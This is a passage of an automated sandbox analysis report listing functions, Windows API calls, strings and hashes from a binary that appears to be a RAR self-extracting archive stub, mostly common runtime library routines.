                                                            • _free.LIBCMT ref: 00BF9748
                                                            • _free.LIBCMT ref: 00BF9753
                                                            • _free.LIBCMT ref: 00BF975E
                                                            • _free.LIBCMT ref: 00BF976C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: c8f38a6dd3ac2ba90b72366d89156ad2a05769e481ad9c200b815fbde0711b03
                                                            • Instruction ID: 9655b784ee17d40955c1dddf1e9c23ba2163efb145cd3a700fb3b96c6b32ec79
                                                            • Opcode Fuzzy Hash: c8f38a6dd3ac2ba90b72366d89156ad2a05769e481ad9c200b815fbde0711b03
                                                            • Instruction Fuzzy Hash: 0111A47A11010DAFCB01EF94C842DE93BB5EF15390B5154A9FB088F262DE32DE589B84
                                                            Function 00BF2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: e4f8c0af8084f0c20caf0929e0b9cc8c1cdd26feb870ed7dc14cb37673f82b1d
                                                            • Instruction ID: 33666b62f1a3c80ddb9f9e4159aa310e7a4ec48726a4aec20c7447b43bb3ff97
                                                            • Opcode Fuzzy Hash: e4f8c0af8084f0c20caf0929e0b9cc8c1cdd26feb870ed7dc14cb37673f82b1d
                                                            • Instruction Fuzzy Hash: 57B1347180020DEFCF29EFA4C8819BEBBF5EF14710B1441AAEA156B212D735DB59CB91
                                                            Function 00BD6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD6FAA
                                                            • _wcslen.LIBCMT ref: 00BD7013
                                                            • _wcslen.LIBCMT ref: 00BD7084
                                                              • Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
                                                              • Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
                                                              • Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: e1a6f2fbe51caff8a6430f808a1397b30674a5ef5e26ce9228046ba8c86aeb39
                                                            • Instruction ID: e49c48cd6898e16c0646dbf3bf1e8d7a70614ed6fe47c852dfb22b1bb772b6ad
                                                            • Opcode Fuzzy Hash: e1a6f2fbe51caff8a6430f808a1397b30674a5ef5e26ce9228046ba8c86aeb39
                                                            • Instruction Fuzzy Hash: 2F41B7B1D4838479EB20A7749C82FEEF7EC9F14314F0445D7FA55A62C2FA749A488621
                                                            Function 00BEB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BEB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BEB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BEB650
                                                            • SetWindowTextW.USER32(?,?), ref: 00BEB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 00BEB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BEB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BEB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: 74dc12b1500cb121c3cf72fb6de72811d51e62e4732224dfd4f00042da02947f
                                                            • Instruction ID: 596f36c7d711dfd8ada6be620317df03fd581d12033758189db0e8f656f6637d
                                                            • Opcode Fuzzy Hash: 74dc12b1500cb121c3cf72fb6de72811d51e62e4732224dfd4f00042da02947f
                                                            • Instruction Fuzzy Hash: C221F732614288BFD6219F77ED89F3F7BBCEB4AB41F010058F605A65E0CB629902D631
                                                            Function 00BEFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7A853BE7,00000001,00000000,00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00BEFE1F
                                                            • _com_issue_error.COMSUPP ref: 00BEFE48
                                                            • _com_issue_error.COMSUPP ref: 00BEFE52
                                                            • GetLastError.KERNEL32(80070057,7A853BE7,00000001,00000000,00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE57
                                                            • _com_issue_error.COMSUPP ref: 00BEFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE80
                                                            • _com_issue_error.COMSUPP ref: 00BEFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: 10923e2525d559266e164e398ac6687538e915600f47f917ef5accd81feecf62
                                                            • Instruction ID: 890012a1120f0ddcd5239f6c3562c1eb07f3b1003d8cd4e6e348c8b5a35ba6b6
                                                            • Opcode Fuzzy Hash: 10923e2525d559266e164e398ac6687538e915600f47f917ef5accd81feecf62
                                                            • Instruction Fuzzy Hash: 9C41EB71A0029AABCB109F65CC45BBEBBE8EF48710F2042B9F915D7391D735A900C7A5
                                                            Function 00BDAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: a29c45ed0f9396b75ab9600265084fc6559f9c6864028257335e7884d0384b27
                                                            • Instruction ID: 93308de2b72f7f8526419c673530fb63bb5db2a4e364b6efd93a53765553437a
                                                            • Opcode Fuzzy Hash: a29c45ed0f9396b75ab9600265084fc6559f9c6864028257335e7884d0384b27
                                                            • Instruction Fuzzy Hash: 1D715E71A00659EFDF14DF64CC99EAEB7B9FF48710B15419AE512A73A0DB30AE01CB50
                                                            Function 00BD9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BD93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BD93C9
                                                              • Part of subcall function 00BDC29A: _wcslen.LIBCMT ref: 00BDC2A2
                                                              • Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1
                                                            • _swprintf.LIBCMT ref: 00BD9465
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 00BD94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 00BD9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 1b3e246f923158d25ff167b47db70714db4db089c277e3e47b6783267cbda174
                                                            • Instruction ID: 18e9f13b8484785137ab425846ec0ff8d5d3cf9ba9f0a1a27eecc2a1e0ef2ada
                                                            • Opcode Fuzzy Hash: 1b3e246f923158d25ff167b47db70714db4db089c277e3e47b6783267cbda174
                                                            • Instruction Fuzzy Hash: B741637190025966DF21ABA1DC45EDEF3BCEF55344F0048E6B649E3251FB388B89CB60
                                                            Function 00BE1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 00BE122E
                                                              • Part of subcall function 00BDB146: GetVersionExW.KERNEL32(?), ref: 00BDB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BE1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BE1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BE1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BE12CF
                                                            • __aullrem.LIBCMT ref: 00BE1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 942a122988d25df7eaae5392b548c884f4cba231ef1350e3a58f7d7881ea0a9a
                                                            • Instruction ID: 79aaea082d9593b903ec08bc180c7bc25c35bf0d42e11183efa68afd38e4b4d7
                                                            • Opcode Fuzzy Hash: 942a122988d25df7eaae5392b548c884f4cba231ef1350e3a58f7d7881ea0a9a
                                                            • Instruction Fuzzy Hash: 4241F7B1508345AFC710DF69C884A6FBBE9FB88314F108D2EF596C2610E778E549DB52
                                                            Function 00BD2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BD2536
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: e666734c8c3563c138d0e363306a5df4250191ebbac68c2b783684df215dddf9
                                                            • Instruction ID: 3eb677966329f72204934822e3e8e8bad40d0fe43b0df5a2e3118f76f14ab066
                                                            • Opcode Fuzzy Hash: e666734c8c3563c138d0e363306a5df4250191ebbac68c2b783684df215dddf9
                                                            • Instruction Fuzzy Hash: CDF1E9706083C15BDB15DB248495BFAFBD59FA0300F0805EBEE869B383EB659945C7A2
                                                            Function 00BE9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: d1b9223b6a95bf79e9a9f2cc64cf633e76edb6c054c536a7578361d487bbb8e4
                                                            • Instruction ID: ee7740a0343dadec621b6073a5fe63db29e875f1f0dbb9012d41c9e876baf08a
                                                            • Opcode Fuzzy Hash: d1b9223b6a95bf79e9a9f2cc64cf633e76edb6c054c536a7578361d487bbb8e4
                                                            • Instruction Fuzzy Hash: 085127667403F295DB349A2B9C1177673E0DFA1750F6845BAFAC1CB1C0FBA58C8D82A1
                                                            Function 00BFF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BFFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BFF6CF
                                                            • __fassign.LIBCMT ref: 00BFF74A
                                                            • __fassign.LIBCMT ref: 00BFF765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BFF78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00BFFE02,00000000,?,?,?,?,?,?,?,?,?,00BFFE02,00000000), ref: 00BFF7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,00BFFE02,00000000,?,?,?,?,?,?,?,?,?,00BFFE02,00000000), ref: 00BFF7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 530eb01bb2419a3b04616527053dd6c34dc02e1cd5d84e3dd7b8811f368fc72f
                                                            • Instruction ID: 30823a768307041ba4cb6da2c83187c00201ed184461909745165b4e26028482
                                                            • Opcode Fuzzy Hash: 530eb01bb2419a3b04616527053dd6c34dc02e1cd5d84e3dd7b8811f368fc72f
                                                            • Instruction Fuzzy Hash: DE5165B19002499FDB10CFA8DC85BFEFBF8EF09710F14416AE655E7251E670A945CBA0
                                                            Function 00BF2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BF2937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BF29C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF29F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BF2A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: a4ccf7d0eba24dd13e111a3d538dcab678cdf11c33181fd9ed4ce9a78f7dadca
                                                            • Instruction ID: 277ca5a32a222163c0bdd9f36c859f3c2d0ae935ba1521cbb7195cda18efffbb
                                                            • Opcode Fuzzy Hash: a4ccf7d0eba24dd13e111a3d538dcab678cdf11c33181fd9ed4ce9a78f7dadca
                                                            • Instruction Fuzzy Hash: AC41B330A0020CAFCF10DF68C885AAEBBF5EF44324F14C1A5E915AB392D7719A19CF91
                                                            Function 00BE9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00BE9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00BE9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00BE9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00BE9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00BE9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 08602187ba809435380cf763a3ba6d1c05420cc91f4f02b0871d2bddf1af00e9
                                                            • Instruction ID: bd30539fdb74e0fa19b4e663ac35280b60f53a434bddc76930da34690abc32ce
                                                            • Opcode Fuzzy Hash: 08602187ba809435380cf763a3ba6d1c05420cc91f4f02b0871d2bddf1af00e9
                                                            • Instruction Fuzzy Hash: 0D41C231504394EFDB219F66DC88B6F7BE8FF48701F004599F94AAA156CB74E908CBA1
                                                            Function 00BE9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: ef72d11b5552dcb95f010f0cbf2c111dc8f5b5319fda884a2cc1c048be0cabe6
